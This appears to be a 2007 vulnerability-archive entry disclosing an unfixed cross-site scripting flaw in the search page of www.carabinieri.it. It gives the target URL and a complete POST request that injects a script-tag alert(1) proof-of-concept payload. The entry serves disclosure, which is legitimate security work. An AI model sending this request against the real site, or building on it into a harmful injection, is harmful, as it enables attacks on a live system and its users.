Security researcher Langy submitted a cross-site scripting (XSS) vulnerability affecting www.carabinieri.it on 18/12/2007. At the time of submission, the site ranked 85777 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 18/12/2007
Date published: 18/12/2007
Status: UNFIXED
Author: Langy
Domain: www.carabinieri.it
Category: XSS
Pagerank: 85777
URL: http://www.carabinieri.it/Internet/Cerca/default.htm
POST: __VIEWSTATE=…&_ctl55%3A_ctl0%3Aitem=%27%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&_ctl55%3A_ctl0%3ADdlChannels=%2FInternet&_ctl55%3A_ctl0%3AFreeTextMode=0&_ctl55%3A_ctl0%3AbtInvia=Esegui+la+ricerca&_ctl55%3A_ctl0%3AlbPagesize=10